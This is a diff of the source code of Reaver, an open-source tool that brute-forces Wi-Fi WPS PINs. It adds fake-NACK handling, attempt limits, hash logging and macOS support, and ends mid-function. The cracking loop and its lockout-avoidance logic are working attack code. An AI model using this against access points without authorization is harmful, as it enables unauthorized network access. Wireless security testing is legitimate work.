12 | AC_CHECK_HEADERS([sqlite3.h],[],[echo "error: missing sqlite3 header files" && exit -1]) | |
10 | AC_CHECK_HEADERS([pcap.h],[],[echo "error: missing pcap header files" && exit -1]) | |
11 | ||
12 | AC_ARG_ENABLE(savetocurrent, | |
13 | AC_HELP_STRING([--enable-savetocurrent], | |
14 | [saves the current session file to the directory reaver was started from]) | |
15 | , [ CFLAGS="$CFLAGS -DSAVETOCURRENT" ]) | |
13 | 16 | |
14 | 17 | cp confdefs.h config.h |
15 | 18 |
0 | 0 | /* |
1 | 1 | * Reaver - Main cracking functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
31 | 32 | */ |
32 | 33 | |
33 | 34 | #include "cracker.h" |
35 | #include "globule.h" | |
34 | 36 | |
35 | 37 | time_t last_display = 0; |
36 | 38 | int last_attempts = 0; |
38 | 40 | /* Brute force all possible WPS pins for a given access point */ |
39 | 41 | void crack() |
40 | 42 | { |
41 | unsigned char *bssid = NULL; | |
43 | char *bssid = NULL; | |
42 | 44 | char *pin = NULL; |
43 | int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0; | |
45 | int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0, pin_attempts = 0; | |
44 | 46 | time_t start_time = 0; |
45 | 47 | enum wps_result result = 0; |
46 | 48 | |
77 | 79 | */ |
78 | 80 | cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid); |
79 | 81 | read_ap_beacon(); |
80 | process_auto_options(); | |
81 | 82 | |
82 | 83 | /* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */ |
83 | 84 | if(get_max_pin_attempts() == -1) |
123 | 124 | /* Main cracking loop */ |
124 | 125 | for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++) |
125 | 126 | { |
126 | /* | |
127 | * Some APs may do brute force detection, or might not be able to handle an onslaught of WPS | |
128 | * registrar requests. Using a delay here can help prevent the AP from locking us out. | |
129 | */ | |
130 | pcap_sleep(get_delay()); | |
131 | 127 | |
132 | 128 | /* Users may specify a delay after x number of attempts */ |
133 | 129 | if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count())) |
165 | 161 | } |
166 | 162 | else |
167 | 163 | { |
168 | cprintf(WARNING, "[+] Trying pin %s.\n", pin); | |
164 | cprintf(WARNING, "[+] Trying pin %s\n", pin); | |
169 | 165 | } |
170 | 166 | |
171 | 167 | /* |
193 | 189 | */ |
194 | 190 | result = do_wps_exchange(); |
195 | 191 | |
192 | /* | |
193 | * The WPA key and other settings are stored in the globule->wps structure. If we've | |
194 | * recovered the WPS pin and parsed these settings, don't free this structure. It | |
195 | * will be freed by wpscrack_free() at the end of main(). | |
196 | */ | |
197 | if(get_key_status() != KEY_DONE) | |
198 | { | |
199 | // We have to free wps, before making any call to pcap_sleep! Otherwise we should except Segmentation fault on SIGINT. | |
200 | wps_deinit(get_wps()); | |
201 | set_wps(NULL); | |
202 | } | |
203 | /* If we have cracked the pin, save a copy */ | |
204 | else | |
205 | { | |
206 | set_pin(pin); | |
207 | } | |
208 | ||
209 | ||
196 | 210 | switch(result) |
197 | 211 | { |
198 | 212 | /* |
203 | 217 | case KEY_REJECTED: |
204 | 218 | fail_count = 0; |
205 | 219 | advance_pin_count(); |
220 | pin_attempts++; | |
206 | 221 | cprintf(WARNING, "[+] Pin count advanced: %i. Max pin attempts: %i\n", get_pin_count(), get_max_pin_attempts()); |
207 | 222 | break; |
208 | 223 | /* Got it!! */ |
209 | 224 | case KEY_ACCEPTED: |
225 | break; | |
226 | case FAKE_NACK: | |
227 | cprintf(WARNING, "[!] WARNING: Fake NACK detected, waiting %d seconds before re-checking\n", get_fake_nack_delay()); | |
228 | pcap_sleep(get_fake_nack_delay()); | |
229 | fail_count = 0; | |
210 | 230 | break; |
211 | 231 | /* Unexpected timeout or EAP failure...try this pin again */ |
212 | 232 | default: |
232 | 252 | } |
233 | 253 | |
234 | 254 | /* |
235 | * The WPA key and other settings are stored in the globule->wps structure. If we've | |
236 | * recovered the WPS pin and parsed these settings, don't free this structure. It | |
237 | * will be freed by wpscrack_free() at the end of main(). | |
255 | * Some APs may do brute force detection, or might not be able to handle an onslaught of WPS | |
256 | * registrar requests. Using a delay here can help prevent the AP from locking us out. | |
238 | 257 | */ |
239 | 258 | if(get_key_status() != KEY_DONE) |
240 | { | |
241 | wps_deinit(get_wps()); | |
242 | set_wps(NULL); | |
243 | } | |
244 | /* If we have cracked the pin, save a copy */ | |
245 | else | |
246 | { | |
247 | set_pin(pin); | |
248 | } | |
259 | pcap_sleep(get_delay()); | |
260 | ||
249 | 261 | free(pin); |
250 | 262 | pin = NULL; |
251 | 263 | |
252 | 264 | /* If we've hit our max number of pin attempts, quit */ |
253 | if((get_max_pin_attempts() > 0) && | |
254 | (get_pin_count() == get_max_pin_attempts())) | |
255 | { | |
256 | if(get_exhaustive()){ | |
257 | cprintf(WARNING, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts()); | |
258 | break; | |
259 | } | |
260 | else | |
261 | { | |
262 | cprintf(WARNING, "[+] Checksum mode was not successful. Starting exhaustive attack\n"); | |
263 | set_exhaustive(1); | |
264 | set_p2_index(0); | |
265 | } | |
265 | if (get_cracking_done() || (pin_attempts == get_quit_pin_attempts()) ) | |
266 | { | |
267 | cprintf(WARNING, "[+] Quitting after %d crack attempts\n", pin_attempts); | |
268 | break; | |
266 | 269 | } |
267 | 270 | } |
268 | 271 | |
310 | 313 | return pin_count; |
311 | 314 | } |
312 | 315 | |
313 | /* Displays the status and rate of cracking */ | |
316 | /* Return non zero to quit reaver. */ | |
317 | int get_cracking_done() | |
318 | { | |
319 | if(get_key_status() == KEY1_WIP) | |
320 | { | |
321 | if (get_pin_count() == P1_SIZE) | |
322 | { | |
323 | if(get_exhaustive()){ | |
324 | cprintf(WARNING, "[+] First half of pin was not found. Restarting attack.\n"); | |
325 | set_p1_index(0); | |
326 | return 0; | |
327 | } | |
328 | else | |
329 | { | |
330 | return 1; | |
331 | } | |
332 | } | |
333 | } | |
334 | else if(get_key_status() == KEY2_WIP) | |
335 | { | |
336 | if( (get_max_pin_attempts() > 0) && (get_pin_count() == get_max_pin_attempts()) ) | |
337 | { | |
338 | /* Exhaustive mode isn't enabled. */ | |
339 | if(get_exhaustive() == 0) | |
340 | { | |
341 | cprintf(WARNING, "[+] Checksum mode was not successful. Starting exhaustive attack\n"); | |
342 | set_exhaustive(2); | |
343 | set_p2_index(0); | |
344 | return 0; | |
345 | } else | |
346 | /* User activated exhaustive mode. */ | |
347 | if(get_exhaustive() == 1) | |
348 | { | |
349 | cprintf(WARNING, "[+] Second half of pin was not found. Restarting attack.\n"); | |
350 | set_p2_index(0); | |
351 | return 0; | |
352 | } else | |
353 | /* Automatic exhaustive mode. */ | |
354 | if (get_exhaustive() == 2) | |
355 | { | |
356 | return 1; | |
357 | } | |
358 | } | |
359 | } | |
360 | return 0; | |
361 | } | |
362 | ||
363 | char *get_max_time_remaining(int average, int attempts_remaining) | |
364 | { | |
365 | char *max_time, hours[8], minutes[3], seconds[3]; | |
366 | int max_hours = 0, max_minutes = 0, max_seconds = 0; | |
367 | ||
368 | max_time = malloc(16); | |
369 | ||
370 | if(!max_time) | |
371 | exit(-1); | |
372 | ||
373 | if(average) | |
374 | { | |
375 | max_seconds = attempts_remaining * average; | |
376 | if(max_seconds > 60) | |
377 | { | |
378 | max_minutes = max_seconds / 60; | |
379 | max_seconds -= max_minutes * 60; | |
380 | } | |
381 | if(max_minutes > 60) | |
382 | { | |
383 | max_hours = max_minutes / 60; | |
384 | max_minutes -= max_hours * 60; | |
385 | } | |
386 | ||
387 | if(max_seconds < 0 || max_minutes < 0 || max_hours < 0) | |
388 | { | |
389 | free(max_time); | |
390 | return NULL; | |
391 | } | |
392 | ||
393 | sprintf(hours, "%d", max_hours); | |
394 | sprintf(minutes, "%s%d", max_minutes > 9 ? "" : "0", max_minutes); | |
395 | sprintf(seconds, "%s%d", max_seconds > 9 ? "" : "0", max_seconds); | |
396 | ||
397 | sprintf(max_time, "%s:%s:%s", hours, minutes, seconds); | |
398 | } | |
399 | else | |
400 | { | |
401 | free(max_time); | |
402 | return NULL; | |
403 | } | |
404 | ||
405 | return max_time; | |
406 | } | |
407 | ||
408 | //Displays the status and rate of cracking | |
314 | 409 | void display_status(time_t start_time) |
315 | 410 | { |
316 | 411 | float percentage = 0; |
322 | 417 | { |
323 | 418 | attempts = get_p1_index() + get_p2_index(); |
324 | 419 | } |
325 | /* | |
326 | * If we've found the first half of the key, then the entire key1 keyspace | |
327 | * has been exhausted/eliminated. Our output should reflect that. | |
328 | */ | |
420 | // If we've found the first half of the key, then the entire key1 keyspace | |
421 | // has been exhausted/eliminated. Our output should reflect that. | |
329 | 422 | else if(get_key_status() == KEY2_WIP) |
330 | 423 | { |
331 | 424 | attempts = P1_SIZE + get_p2_index(); |
48 | 48 | |
49 | 49 | void crack(); |
50 | 50 | void advance_pin_count(); |
51 | int get_cracking_done(); | |
51 | 52 | int get_pin_count(); |
52 | 53 | void display_status(time_t start_time); |
53 | 54 |
10 | 10 | |
11 | 11 | CFLAGS += -DCONFIG_TLS_INTERNAL_CLIENT |
12 | 12 | CFLAGS += -DCONFIG_TLS_INTERNAL_SERVER |
13 | CFLAGS += -fno-strict-aliasing | |
13 | 14 | #CFLAGS += -DALL_DH_GROUPS |
14 | 15 | |
15 | 16 | LIB_OBJS= \ |
187 | 187 | MD5Transform(ctx->buf, (u32 *) ctx->in); |
188 | 188 | byteReverse((unsigned char *) ctx->buf, 4); |
189 | 189 | os_memcpy(digest, ctx->buf, 16); |
190 | os_memset(ctx, 0, sizeof(ctx)); /* In case it's sensitive */ | |
190 | os_memset(ctx, 0, sizeof(*ctx)); /* In case it's sensitive */ | |
191 | 191 | } |
192 | 192 | |
193 | 193 | /* The four core functions - F1 is optimized somewhat */ |
0 | 0 | /* |
1 | 1 | * Reaver - Common definitions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
84 | 85 | #define DEFAULT_DELAY 1 /* Seconds */ |
85 | 86 | #define DEFAULT_TIMEOUT 5 /* Seconds */ |
86 | 87 | #define DEFAULT_LOCK_DELAY 60 /* Seconds */ |
88 | #define DEFAULT_FK_NACK_DELAY 0 /* Seconds */ | |
87 | 89 | #define SEC_TO_US 1000000 /* uSeconds in a Second */ |
88 | 90 | |
89 | 91 | #define TSFT_SIZE 8 |
136 | 138 | KEY_REJECTED = 1, |
137 | 139 | RX_TIMEOUT = 2, |
138 | 140 | EAP_FAIL = 3, |
139 | UNKNOWN_ERROR = 4 | |
141 | UNKNOWN_ERROR = 4, | |
142 | FAKE_NACK = 5 | |
140 | 143 | }; |
141 | 144 | |
142 | 145 | enum nack_code |
310 | 313 | { |
311 | 314 | struct frame_control fc; |
312 | 315 | uint16_t duration; |
313 | unsigned char addr1[MAC_ADDR_LEN]; | |
314 | unsigned char addr2[MAC_ADDR_LEN]; | |
315 | unsigned char addr3[MAC_ADDR_LEN]; | |
316 | uint16_t frag_seq; | |
316 | unsigned char addr1[MAC_ADDR_LEN]; //Destnation address | |
317 | unsigned char addr2[MAC_ADDR_LEN]; //Transmiter address | |
318 | unsigned char addr3[MAC_ADDR_LEN]; //Source address | |
319 | uint16_t frag_seq; // Fragment : 4; Sequence : 12 | |
317 | 320 | }; |
318 | 321 | |
319 | 322 | struct authentication_management_frame |
0 | 0 | /* |
1 | 1 | * Reaver - WPS exchange functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
150 | 151 | tx_type = SEND_WSC_NACK; |
151 | 152 | break; |
152 | 153 | case NACK: |
153 | cprintf(VERBOSE, "[+] Received WSC NACK\n"); | |
154 | cprintf(VERBOSE, "[+] Received WSC NACK (reason: 0x%04X)\n",get_nack_reason()); | |
154 | 155 | got_nack = 1; |
155 | 156 | break; |
156 | 157 | case TERMINATE: |
157 | 158 | terminated = 1; |
158 | 159 | break; |
160 | case UNKNOWN: | |
161 | // cprintf(VERBOSE, "[+] Received UNKNOWN packet\n"); | |
162 | break; | |
159 | 163 | default: |
160 | if(packet_type != 0) | |
161 | { | |
162 | cprintf(VERBOSE, "[!] WARNING: Unexpected packet received (0x%.02X), terminating transaction\n", packet_type); | |
163 | terminated = 1; | |
164 | } | |
164 | cprintf(VERBOSE, "[!] WARNING: Unexpected packet received (0x%.02X), terminating transaction\n", packet_type); | |
165 | terminated = 1; | |
165 | 166 | break; |
166 | 167 | } |
167 | 168 | |
179 | 180 | * packet, since the timer is started by send_msg. Manually start the timer to |
180 | 181 | * prevent infinite loops. |
181 | 182 | */ |
182 | else if(packet_type != 0) | |
183 | else if(packet_type != UNKNOWN) | |
183 | 184 | { |
184 | 185 | start_timer(); |
185 | 186 | } |
211 | 212 | /* |
212 | 213 | * There are four states that can signify a pin failure: |
213 | 214 | * |
214 | * o Got NACK instead of an M5 message (first half of pin wrong) | |
215 | * o Got NACK instead of an M7 message (second half of pin wrong) | |
216 | * o Got receive timeout while waiting for an M5 message (first half of pin wrong) | |
217 | * o Got receive timeout while waiting for an M7 message (second half of pin wrong) | |
215 | * o Got NACK instead of an M5 message (first half of pin wrong) | |
216 | * o Got NACK instead of an M5 message, when cracking second half (fake NACK) | |
217 | * o Got NACK instead of an M7 message (second half of pin wrong) | |
218 | * o Got receive timeout while waiting for an M5 message (first half of pin wrong) | |
219 | * o Got receive timeout while waiting for an M7 message (second half of pin wrong) | |
218 | 220 | */ |
219 | 221 | if(got_nack) |
220 | 222 | { |
223 | 225 | * SEND_WSC_NACK, indicating that we need to reply with a NACK. So check the |
224 | 226 | * previous state to see what state we were in when the NACK was received. |
225 | 227 | */ |
226 | if(last_msg == M3 || last_msg == M5) | |
227 | { | |
228 | /* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */ | |
229 | set_timeout_is_nack(0); | |
230 | ||
231 | ret_val = KEY_REJECTED; | |
232 | } | |
233 | else | |
234 | { | |
235 | ret_val = UNKNOWN_ERROR; | |
228 | ||
229 | ||
230 | /* Warning the user about change of reason code for the received NACK message. */ | |
231 | if (!get_ignore_nack_reason()) | |
232 | { | |
233 | if ((get_last_nack_reason() >= 0) && (get_nack_reason() != get_last_nack_reason())) | |
234 | { | |
235 | cprintf(WARNING, "[!] WARNING: The reason code for NACK has been changed. Potential FAKE NACK!\n"); | |
236 | } | |
237 | set_last_nack_reason( get_nack_reason() ); | |
238 | } | |
239 | ||
240 | /* Check NACK reason code for */ | |
241 | if ((get_fake_nack_reason() >= 0) && (get_nack_reason() == get_fake_nack_reason())) | |
242 | { | |
243 | ret_val = FAKE_NACK; | |
244 | } else { | |
245 | if ((last_msg == M3) || (last_msg == M5)) | |
246 | { | |
247 | /* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */ | |
248 | set_timeout_is_nack(0); | |
249 | ||
250 | /* bug fix made by KokoSoft */ | |
251 | ret_val = ((last_msg == M3) && (get_key_status() == KEY2_WIP)) ? FAKE_NACK : KEY_REJECTED; | |
252 | } | |
253 | else | |
254 | { | |
255 | ret_val = UNKNOWN_ERROR; | |
256 | } | |
236 | 257 | } |
237 | 258 | } |
238 | 259 | else if(premature_timeout) |
429 | 450 | struct wfa_element_header element = { 0 }; |
430 | 451 | int i = 0, header_size = sizeof(struct wfa_element_header); |
431 | 452 | |
453 | if (data_size == 0) | |
454 | { | |
455 | /* | |
456 | * Treat zero data length WPS messages as NACKs. | |
457 | * Required for certain APs that emit empty WPS messages in place of NACKs. | |
458 | */ | |
459 | type = NACK; | |
460 | set_nack_reason(NO_ERROR); | |
461 | } | |
432 | 462 | /* Shove data into a wpabuf structure for processing */ |
433 | msg = wpabuf_alloc_copy(data, data_size); | |
434 | if(msg) | |
463 | else if (msg = wpabuf_alloc_copy(data, data_size)) | |
435 | 464 | { |
436 | 465 | /* Process the incoming message */ |
437 | 466 | wps_registrar_process_msg(wps, get_opcode(), msg); |
457 | 486 | { |
458 | 487 | case MESSAGE_TYPE: |
459 | 488 | type = (uint8_t) element_data[0]; |
489 | break; | |
490 | case CONFIGURATION_ERROR: | |
491 | /* Check element_data length */ | |
492 | if ( element.length == 2) | |
493 | set_nack_reason( htons( *( (uint16_t*) element_data) ) ); | |
460 | 494 | break; |
461 | 495 | default: |
462 | 496 | break; |
0 | 0 | /* |
1 | 1 | * Reaver - Global variable access functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
31 | 32 | */ |
32 | 33 | |
33 | 34 | #include "globule.h" |
35 | #include "misc.h" | |
34 | 36 | |
35 | 37 | int globule_init() |
36 | 38 | { |
104 | 106 | |
105 | 107 | void set_p1_index(int index) |
106 | 108 | { |
107 | if(index < P1_SIZE) | |
109 | if(index <= P1_SIZE) | |
108 | 110 | { |
109 | 111 | cprintf(VERBOSE,"[+] p1_index set to %i\n",index); |
110 | 112 | globule->p1_index = index; |
117 | 119 | |
118 | 120 | void set_p2_index(int index) |
119 | 121 | { |
120 | if(index <= P2_SIZE + globule->exhaustive*(P1_SIZE - P2_SIZE)) | |
122 | if(index <= P2_SIZE + (globule->exhaustive ? (P1_SIZE - P2_SIZE) : 0) ) | |
121 | 123 | { |
122 | 124 | cprintf(VERBOSE,"[+] p2_index set to %i\n",index); |
123 | 125 | globule->p2_index = index; |
232 | 234 | return globule->ignore_locks; |
233 | 235 | } |
234 | 236 | |
237 | void set_fake_nack_delay(int delay) | |
238 | { | |
239 | globule->fake_nack_delay = delay; | |
240 | } | |
241 | int get_fake_nack_delay() | |
242 | { | |
243 | return globule->fake_nack_delay; | |
244 | } | |
245 | ||
235 | 246 | void set_eap_terminate(int value) |
236 | 247 | { |
237 | 248 | globule->eap_terminate = value; |
251 | 262 | return globule->max_pin_attempts; |
252 | 263 | } |
253 | 264 | |
265 | void set_quit_pin_attempts(int value) | |
266 | { | |
267 | globule->quit_pin_attempts = value; | |
268 | } | |
269 | ||
270 | int get_quit_pin_attempts() | |
271 | { | |
272 | return globule->quit_pin_attempts; | |
273 | } | |
274 | ||
254 | 275 | void set_pixie_loop(int value) |
255 | 276 | { |
256 | 277 | globule->pixie_loop = value; |
261 | 282 | return globule->pixie_loop; |
262 | 283 | } |
263 | 284 | |
285 | void set_pixie_log(int value) | |
286 | { | |
287 | globule->pixie_log = value; | |
288 | } | |
289 | ||
290 | int get_pixie_log() | |
291 | { | |
292 | return globule->pixie_log; | |
293 | } | |
294 | ||
264 | 295 | void set_max_num_probes(int value) |
265 | 296 | { |
266 | 297 | globule->max_num_probes = value; |
342 | 373 | return globule->auto_channel_select; |
343 | 374 | } |
344 | 375 | |
345 | void set_auto_detect_options(int value) | |
346 | { | |
347 | globule->auto_detect_options = value; | |
348 | } | |
349 | int get_auto_detect_options() | |
350 | { | |
351 | return globule->auto_detect_options; | |
352 | } | |
353 | ||
354 | 376 | void set_wifi_band(int value) |
355 | 377 | { |
356 | 378 | globule->wifi_band = value; |
398 | 420 | |
399 | 421 | void set_bssid(unsigned char *value) |
400 | 422 | { |
401 | memcpy((unsigned char *) &globule->bssid, value, MAC_ADDR_LEN); | |
423 | memcpy(globule->bssid, value, MAC_ADDR_LEN); | |
402 | 424 | } |
403 | 425 | unsigned char *get_bssid() |
404 | 426 | { |
405 | return (unsigned char *) &globule->bssid; | |
427 | return globule->bssid; | |
406 | 428 | } |
407 | 429 | |
408 | 430 | void set_mac(unsigned char *value) |
409 | 431 | { |
410 | memcpy((unsigned char *) &globule->mac, value, MAC_ADDR_LEN); | |
432 | memcpy(globule->mac, value, MAC_ADDR_LEN); | |
411 | 433 | } |
412 | 434 | unsigned char *get_mac() |
413 | 435 | { |
414 | return (unsigned char *) &globule->mac; | |
436 | return globule->mac; | |
415 | 437 | } |
416 | 438 | |
417 | 439 | void set_ssid(char *value) |
499 | 521 | void set_exhaustive(int value) |
500 | 522 | { |
501 | 523 | globule->exhaustive = value; |
502 | if(value == 1) | |
503 | { | |
504 | globule->max_pin_attempts=P1_SIZE+P1_SIZE; | |
524 | if(value) | |
525 | { | |
526 | set_max_pin_attempts(P1_SIZE + P1_SIZE); | |
505 | 527 | } |
506 | 528 | } |
507 | 529 | |
528 | 550 | return globule->external_association; |
529 | 551 | } |
530 | 552 | |
531 | void set_nack_reason(enum nack_code value) | |
553 | void set_nack_reason(uint16_t value) | |
532 | 554 | { |
533 | 555 | globule->nack_reason = value; |
534 | 556 | } |
535 | enum nack_code get_nack_reason() | |
557 | uint16_t get_nack_reason() | |
536 | 558 | { |
537 | 559 | return globule->nack_reason; |
560 | } | |
561 | ||
562 | void set_last_nack_reason(int value) | |
563 | { | |
564 | globule->last_nack_reason = value; | |
565 | } | |
566 | int get_last_nack_reason() | |
567 | { | |
568 | return globule->last_nack_reason; | |
569 | } | |
570 | ||
571 | void set_fake_nack_reason(int value) | |
572 | { | |
573 | globule->fake_nack_reason = value; | |
574 | } | |
575 | int get_fake_nack_reason() | |
576 | { | |
577 | return globule->fake_nack_reason; | |
578 | } | |
579 | ||
580 | void set_ignore_nack_reason(int value) | |
581 | { | |
582 | globule->ignore_nack_reason = value; | |
583 | } | |
584 | int get_ignore_nack_reason() | |
585 | { | |
586 | return globule->ignore_nack_reason; | |
538 | 587 | } |
539 | 588 | |
540 | 589 | void set_handle(pcap_t *value) |
0 | 0 | /* |
1 | 1 | * Reaver - Global variable access functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
38 | 39 | struct globals |
39 | 40 | { |
40 | 41 | int pixie_loop; /* Loops through up to M4 */ |
42 | int pixie_log; /* Logs PixieDust hashes to executing directory */ | |
41 | 43 | int last_wps_state; /* Holds the previous WPS state as stored in wps->state */ |
42 | 44 | |
43 | 45 | int p1_index; /* Index into p1 array for building WPS pins */ |
62 | 64 | |
63 | 65 | int win7_compat; /* Set to 1 to make WPS messages mimic Windows 7 settings. */ |
64 | 66 | |
65 | int exhaustive; /* Set to 1 to use exhaustive pin generation instead of checksum the last digit */ | |
67 | int exhaustive; /* Set to 1 to use exhaustive pin generation instead of checksum the last digit, and restart if pin wasn't found. | |
68 | * Automatically set to 2, when checksum mode was not successful. */ | |
66 | 69 | |
67 | 70 | int delay; /* Seconds to sleep in between key attempts */ |
68 | 71 | |
74 | 77 | |
75 | 78 | int ignore_locks; /* Ignore locked state */ |
76 | 79 | |
80 | int fake_nack_delay; /* Seconds to sleep after received fake NACK. */ | |
81 | ||
77 | 82 | int recurring_delay_count; /* Enter a recurring delay after recurring_delay_count pin attempts */ |
78 | 83 | |
79 | 84 | int eap_terminate; /* Experimental */ |
80 | 85 | |
81 | 86 | int max_pin_attempts; /* Maximum number of pin attempts */ |
82 | 87 | |
88 | int quit_pin_attempts; /* Number of pin attempts to quit */ | |
89 | ||
83 | 90 | int rx_timeout; /* Receive timeout period (seconds) */ |
84 | 91 | |
85 | 92 | int timeout_is_nack; /* Treat M5/M7 receive timeouts as NACKs (only needed for shoddy WPS implementations) */ |
96 | 103 | |
97 | 104 | int auto_channel_select; /* Diables automatic parsing and changing of the current channel number, as specified in the AP's beacon packet */ |
98 | 105 | |
99 | int auto_detect_options; /* If true, Reaver will auto detect the best command line options for the attack */ | |
100 | ||
101 | 106 | int wifi_band; /* Determines if we use the A/N bands or B/G bands */ |
102 | 107 | |
103 | 108 | int channel; /* Holds the current channel number */ |
132 | 137 | |
133 | 138 | char *exec_string; /* Pointer to user-supplied command to execute upon success */ |
134 | 139 | |
135 | enum nack_code nack_reason; /* Stores the nack code for the last received WSC_NACK message */ | |
140 | uint16_t nack_reason; /* Stores the nack code for the last received WSC_NACK message */ | |
141 | int last_nack_reason; /* Stores the nack code for the previously received WSC_NACK message */ | |
142 | int fake_nack_reason; /* The nack code used in FAKE NACK message */ | |
143 | int ignore_nack_reason; /* Ignore the nack code for received WSC_NACK message */ | |
136 | 144 | |
137 | 145 | pcap_t *handle; /* Pcap handle */ |
138 | 146 | |
141 | 149 | * function calls. |
142 | 150 | */ |
143 | 151 | |
144 | int op_pixie; /*make pixiewps*/ | |
145 | char cmd_reaver_test[4000]; /*auto reaver with pin */ | |
146 | int op_autopass; /*auto reaver with pin*/ | |
147 | int stop_in_m1; | |
148 | int op_gen_pin; | |
152 | int op_pixie; /* make pixiewps */ | |
153 | char cmd_reaver_test[4000]; /* auto reaver with pin */ | |
154 | int op_autopass; /* auto reaver with pin */ | |
155 | int stop_in_m1; /* stop reaver in m1 message */ | |
156 | int op_gen_pin; /* gen default pin */ | |
157 | ||
149 | 158 | |
150 | 159 | } *globule; |
151 | 160 | |
183 | 192 | int get_lock_delay(); |
184 | 193 | void set_ignore_locks(int value); |
185 | 194 | int get_ignore_locks(); |
195 | void set_fake_nack_delay(int delay); | |
196 | int get_fake_nack_delay(); | |
186 | 197 | void set_eap_terminate(int value); |
187 | 198 | int get_eap_terminate(); |
188 | 199 | void set_max_pin_attempts(int value); |
205 | 216 | int get_fixed_channel(); |
206 | 217 | void set_auto_channel_select(int value); |
207 | 218 | int get_auto_channel_select(); |
208 | void set_auto_detect_options(int value); | |
209 | int get_auto_detect_options(); | |
210 | 219 | void set_wifi_band(int value); |
211 | 220 | int get_wifi_band(); |
212 | 221 | void set_opcode(enum wsc_op_code value); |
239 | 248 | int get_dh_small(void); |
240 | 249 | void set_external_association(int value); |
241 | 250 | int get_external_association(void); |
242 | void set_nack_reason(enum nack_code value); | |
243 | enum nack_code get_nack_reason(); | |
251 | void set_nack_reason(uint16_t value); | |
252 | uint16_t get_nack_reason(); | |
253 | void set_last_nack_reason(int value); | |
254 | int get_last_nack_reason(); | |
255 | void set_fake_nack_reason(int value); | |
256 | int get_fake_nack_reason(); | |
257 | void set_ignore_nack_reason(int value); | |
258 | int get_ignore_nack_reason(); | |
244 | 259 | void set_handle(pcap_t *value); |
245 | 260 | pcap_t *get_handle(); |
246 | 261 | void set_wps(struct wps_data *value); |
251 | 266 | char *get_exec_string(void); |
252 | 267 | void set_oo_send_nack(int value); |
253 | 268 | int get_oo_send_nack(void); |
269 | int get_quit_pin_attempts(); | |
254 | 270 | void set_op_pixie(int index); |
255 | 271 | void set_op_autopass(int index); |
272 | void set_op_gen_pin(int index); | |
256 | 273 | void set_cmd_reaver_test(char *string); |
257 | 274 | void set_pixie_loop(int value); |
258 | 275 | int get_pixie_loop(); |
276 | void set_pixie_log(int value); | |
277 | int get_pixie_log(); | |
259 | 278 | void set_stop_in_m1(int index); |
279 | void set_quit_pin_attempts(int value); | |
260 | 280 | |
261 | 281 | |
262 | 282 | #endif |
33 | 33 | #include "iface.h" |
34 | 34 | |
35 | 35 | /* Populates globule->mac with the MAC address of the interface globule->iface */ |
36 | #ifdef __APPLE__ | |
37 | int read_iface_mac() { | |
38 | struct ifaddrs* iflist; | |
39 | int found = 0; | |
40 | if (getifaddrs(&iflist) == 0) { | |
41 | struct ifaddrs* cur; | |
42 | for (cur = iflist; cur; cur = cur->ifa_next) { | |
43 | if ((cur->ifa_addr->sa_family == AF_LINK) && | |
44 | (strcmp(cur->ifa_name, get_iface()) == 0) && | |
45 | cur->ifa_addr) { | |
46 | struct sockaddr_dl* sdl = (struct sockaddr_dl*)cur->ifa_addr; | |
47 | set_mac(LLADDR(sdl)); | |
48 | found = 1; | |
49 | break; | |
50 | } | |
51 | } | |
52 | ||
53 | freeifaddrs(iflist); | |
54 | } | |
55 | return found; | |
56 | } | |
57 | #else | |
36 | 58 | int read_iface_mac() |
37 | 59 | { |
38 | 60 | struct ifreq ifr; |
67 | 89 | |
68 | 90 | return ret_val; |
69 | 91 | } |
70 | ||
92 | #endif | |
71 | 93 | /* |
72 | 94 | * Goes to the next 802.11 channel. |
73 | 95 | * This is mostly required for APs that hop channels, which usually hop between channels 1, 6, and 11. |
82 | 104 | int an_channels[] = AN_CHANNELS; |
83 | 105 | int *channels = NULL; |
84 | 106 | |
107 | /* Only switch channels if fixed channel operation is disabled */ | |
108 | if(get_fixed_channel()) | |
109 | { | |
110 | return 0; | |
111 | } | |
112 | ||
85 | 113 | /* Select the appropriate channels for the target 802.11 band */ |
86 | 114 | if(get_wifi_band() == AN_BAND) |
87 | 115 | { |
94 | 122 | n = sizeof(bg_channels) / sizeof(int); |
95 | 123 | } |
96 | 124 | |
97 | /* Only switch channels if fixed channel operation is disabled */ | |
98 | if(!get_fixed_channel()) | |
125 | i++; | |
126 | ||
127 | if((i >= n) || i < 0) | |
99 | 128 | { |
100 | i++; | |
101 | ||
102 | if((i >= n) || i < 0) | |
103 | { | |
104 | i = 0; | |
105 | } | |
106 | ||
107 | return change_channel(channels[i]); | |
129 | i = 0; | |
